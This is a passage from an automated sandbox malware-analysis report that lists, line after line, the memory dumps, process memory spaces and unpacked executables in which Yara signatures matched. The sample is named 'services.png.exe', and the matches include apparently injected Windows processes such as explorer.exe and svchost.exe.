                        Source: Yara matchFile source: 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: services.png.exe PID: 6516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012, type: MEMORYSTR
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
